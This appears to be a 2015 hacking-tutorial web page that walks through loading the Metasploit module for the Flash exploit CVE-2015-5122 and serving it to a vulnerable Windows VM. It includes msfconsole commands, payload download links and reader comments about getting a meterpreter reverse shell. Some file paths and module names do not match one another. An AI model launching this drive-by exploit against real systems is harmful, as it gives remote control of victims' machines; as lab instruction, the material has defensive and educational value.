• Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Facebook Twitter Instagram
Trending
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
  • Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
  • Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Facebook Twitter YouTube Tumblr Instagram Pinterest
Hacking Tutorials
  • Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Hacking Tutorials
You are at:Home » Metasploit Tutorials » Metasploit CVE-2015-5122 Flash Exploit Tutorial
Metasploit CVE-2015-5122 Flash Exploit Tutorial

Metasploit CVE-2015-5122 Flash Exploit Tutorial

7
By Hacking Tutorials on July 17, 2015 Metasploit Tutorials

In this tutorial we will be importing the CVE-2015-5122 (Adobe Flash opaqueBackground Use After Free) zero day Flash Exploit module in Metasploit and have a vulnerable setup download the malicious Flash file. Recent versions of Adobe Flash Player contain critical vulnerabilities within the ActionScript 3 ByteArray, opaqueBackground and BitmapData classes. Exploiting one of these vulnerabilities could allow a remote attacker to execute arbitrary code on the vulnerable system. CVE-2015-5122 is the 3rd zero-day exploit from the Hacking Team data breach and targets the Adobe Flash Player (18.0.0.203) on Windows 7, Windows 8.1 and Google Chrome on Linux based computers. By the time of writing Adobe has already released security updates for Windows, Mac and Linux. This tutorial is for informational purposes only.

Metasploit CVE-2015-5122 Tutorial

First download the exploit code and make it available to Metasploit by creating an empty document and name it:

Adobe_Flash_HackingTeam_exploit.rb

Than download the payload here:

https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2015-5122

And add it to the following directory:

/usr/share/metasploit-framework/data/exploits/CVE-2015-5119/msf.swf

Now copy the exploit code and paste it into the document.

Metasploit CVE-2015-5122 Flash Exploit 1

Use the following command to copy the file from the desktop to the Metasploit modules folder (create the flash folder first if needed:
mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/

Use the following command to check if the file has been actually copied to the destination folder:

ls /usr/share/metasploit-framework/modules/exploits/windows/flash/

Metasploit CVE-2015-5122 Flash Exploit 2

Let’s open a new terminal and start Metasploit (and services if not already started) using the following command(s):
service postgresql start
service metasploit start
msfconsole

Metasploit CVE-2015-5122 Flash Exploit 3

Now we’ve got Metasploit up and running with our newly imported exploit loaded, we use the following command to search for it:

search hackingteam

Now use the following command to use the newly added exploit:

use exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit

Let’s check the options for Metasploit CVE-2015-5122 module with the following command:

show options

Metasploit CVE-2015-5122 Flash Exploit 4

We will keep the default options and type “run” or “exploit” to start the exploit:

exploit

Metasploit CVE-2015-5122 Flash Exploit 5

Let’s open the link from a Windows 8.1 virtual machine with a vulnerable browser (Firefox) and a vulnerable version of Flash Player (18.0.0.203) installed.

Metasploit CVE-2015-5122 Flash Exploit 6

How to avoid getting infected by CVE-2015-5122 and other exploits…

– Update Flash Player and keep it up-to-date.
– Install security patches and keep your OS up-to-date.
– Install a virus scanner and firewall and keep it updated.
– Keep your browser up-to-date.
– Do not install unneeded plug-ins.

Metasploit CVE-2015-5122 Video Tutorial

Thanks for watching and please subscribe to our YouTube channel for more hacking tutorials :)

Share on:

  • Email
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
Previous ArticleThe Top 10 Wifi Hacking Tools in Kali Linux
Next Article Uniscan Webserver fingerprinting in Kali Linux

Related Posts

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

Installing Rogue-jndi on Kali Linux

CVE-2019-19781: Citrix ADC RCE vulnerability

7 Comments

  1. joe on July 23, 2015 10:25 pm

    going to work really nice with no payload

    Reply
    • Hacking Tutorials on July 24, 2015 8:39 am

      There’s a download link to the payload in the tutorial.

      Reply
  2. Tom on July 24, 2015 10:21 am

    Hi,

    Nice tuto, but, what’s the next step after the “magic” line :

    [*] 192.168.0.12 adobe_flash_hacking_team_uaf – Sending SWF…

    Should I run a payload before running the exploit? I don’t really understand how to use this exploit…

    Reply
    • Hacking Tutorials on July 25, 2015 4:07 pm

      Hi Tom,

      Thanks!

      The payload is run by the victim. After that a Meterpreter session will be opened.

      https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

      Reply
  3. Answer on July 24, 2015 3:31 pm

    Which source code to copy? there are many files in this site:
    https://github.com/rapid7/metasploit-framework/commit/255d8ed096cf25b7207ea8e9b4553f66911b00da

    Reply
    • Hacking Tutorials on July 25, 2015 4:06 pm

      This source code: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb

      Reply
  4. Tom on July 27, 2015 10:06 am

    I used the payload correctly (meterpreter reverse tcp) but i’m stuck after this line:
    [*] 192.168.0.12 adobe_flash_hacking_team_uaf – Sending SWF…
    The meterpreter session never appear.

    Reply

Leave A Reply Cancel Reply

Top Tutorials
By Hacking TutorialsOctober 29, 20220

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

By Hacking TutorialsJanuary 10, 20220

Installing Rogue-jndi on Kali Linux

By Hacking TutorialsDecember 17, 20210

Log4Shell VMware vCenter Server (CVE-2021-44228)

By Hacking TutorialsSeptember 27, 20210

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw

By Hacking TutorialsFebruary 4, 20200

CVE-2019-19781: Citrix ADC RCE vulnerability

By Hacking TutorialsNovember 1, 20188

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

Subscribe

Enter your email address to subscribe to Hacking Tutorials and receive notifications of new tutorials by email.

Join 828 other subscribers
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
Virtual Hacking Labs
Penetration Testin Course and Hacking Labs
Categories
  • Digital Forensics
  • Exploit tutorials
  • General Tutorials
  • Hacking Books
  • Hacking Courses
  • Malware Analysis Tutorials
  • Metasploit Tutorials
  • Networking
  • Pentesting Exchange
  • Scanning Tutorials
  • Web Applications
  • Wifi Hacking Tutorials
Downloads
  • directory_scanner.py (120601 downloads)
  • PEiD-0.95-20081103.zip (111453 downloads)
  • wifi_jammer.py (138197 downloads)
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
Popular Tutorials
By Hacking TutorialsSeptember 1, 2016115

Review: Offensive Security Certified Professional (OSCP)

By Hacking TutorialsApril 18, 201738

Exploiting Eternalblue for shell with Empire & Msfconsole

By Hacking TutorialsMarch 17, 201637

Installing VPN on Kali Linux 2016 Rolling

Featured Downloads
  • directory_scanner.py (120601 downloads)
  • PEiD-0.95-20081103.zip (111453 downloads)
  • wifi_jammer.py (138197 downloads)
© Hacking Tutorials 2022

Type above and press Enter to search. Press Esc to cancel.

Go to mobile version